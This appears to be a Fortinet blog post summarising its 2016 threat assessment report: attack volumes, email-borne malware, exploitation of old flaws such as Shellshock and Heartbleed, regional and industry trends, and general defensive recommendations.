Periodically, Fortinet publishes a set of findings based on threat intelligence gathered from hundreds of Cyber Threat Assessments we have performed across the globe. This report provides analysis and insight into the threats we’ve experienced within certain industry segments and regions.
Published just this week, the most recent report includes some interesting trends that every security professional ought to be reviewing in order to keep ahead of the ever-shifting threat landscape.
Unprecedented Attack Volumes
The Fortinet Cyber Threat Assessment Program (CTAP) recorded over 185 million threat events and incidents. Surprisingly, in spite of an increased focus on security by many organizations, most of these attacks still managed to slip past traditional perimeter security defenses and onto the internal network where Fortinet assessment devices were located. Fortunately, as a result, we have been able to use this data to form a more accurate picture of kinds of threats and techniques that manage to penetrate organizations. Much of that intelligence is reflected in this quarter’s report.
The More Things Change, The More They Stay The Same
In spite of massive campaigns to get users to not click on email links or attachments from senders they don’t know, email-based attacks continue to be successful. One of the most interesting facts gleaned from this quarter’s Fortinet CTAP Report is that email with infected attachments or links leading to malicious content continue to be the primary delivery method of targeting organizations with malware. The next most common attack vector was malicious websites containing infected online content accessed via normal web browsing activities.
In spite of the high-profile growth of ransomware and newer, more sophisticated attacks, we continue to document a steady increase in the volume and velocity of attempted attacks delivered through email. Which also means that far too many organizations have still failed to install and/or implement adequate email security countermeasures.
Hackers traditionally target unpatched devices and that is not set to change anytime soon. In fact, the top globally exploited attempt was targeted against the Bourne Shell vulnerability through the attack commonly referred to as Shellshock – a vulnerability uncovered in 2014. We also saw a large number of Heartbleed attacks targeted at the well-documented OpenSSL vulnerability.
A growing attack vector we are tracking in general is unpatched secondary vulnerabilities embedded in open systems. For some of these, we actually recorded some of the highest numbers of attempted exploits we have seen, running across many industries. The reason seems to be that attackers understand that patching vulnerabilities in libraries or auxiliary software is harder than merely patching primary applications. So far too often, it doesn’t get done.
We also recorded a large number of attacks against commonly used open source applications and services, like OpenBSD and DNS. Additionally, attackers are enhancing these older attacks with new techniques designed to bypass perimeter security defenses and escape detection.
Customized Attacks by Region and Industry
Interestingly, we documented that geographic regions each have their own unique challenges. North America had the most application vulnerability attacks (with more than 40,000 incidents per day). LATAM had the highest peer-to peer application usage in the world, and the H-worm botnet was far and away the dominant malware detected there. In EMEA, the top challenge was the Conficker worm. And Asia-Pacific leads all regions in malware/botnets detected, which may be correlate to their simultaneously being ranked first in malicious websites visited per day.
We have also documented that attackers are being more selective about the sorts of attacks they use depending on the market segment of the organization they have targeted.
- In spite of the high profile ransomware attacks we have all been reading about, Healthcare organizations have actually been primarily hit by attacks targeting the Heartbleed vulnerability, as well as with remote code execution malware and denial of service attacks.
- Recently, it’s the Financial Industry that’s been hit hardest by ransomware, and in far greater numbers than we have observed in other industries. However, we also continue to notice that a number of older attacks have made a comeback against this industry, as well other markets, and these attacks have also been modified to escape detection.
- The Education Sector was targeted by attacks aimed at open source vulnerabilities, leading us to infer that perhaps patching isn’t as high a priority for many schools. We also documented a high number of web-application and client-based attacks.
- And finally, the Technology Sector saw an increase in attacks aimed at common enterprise software packages from companies like Adobe and Microsoft.
This quarter’s report also provides some critical guidance on what to do about the threats we have documented. They include:
- Segment and monitor your network – flat networks offer little resistance to attackers
- Do a better job of controlling access
- Regularly audit your security posture
- Rules are changing, so stay aware of the regulatory requirements in your region and industry
- Train your staff on how to limit their exposure to threats
The quarterly threat landscape report provides a wealth of timely threat analysis and security intelligence. Combined with the weekly Fortinet’s Threat Intelligence Brief, available by subscription, they provide essential information to help keep today’s security professionals apprised of the latest threats targeting their networks.
The 2016 Fortinet CTAP Report is available for download.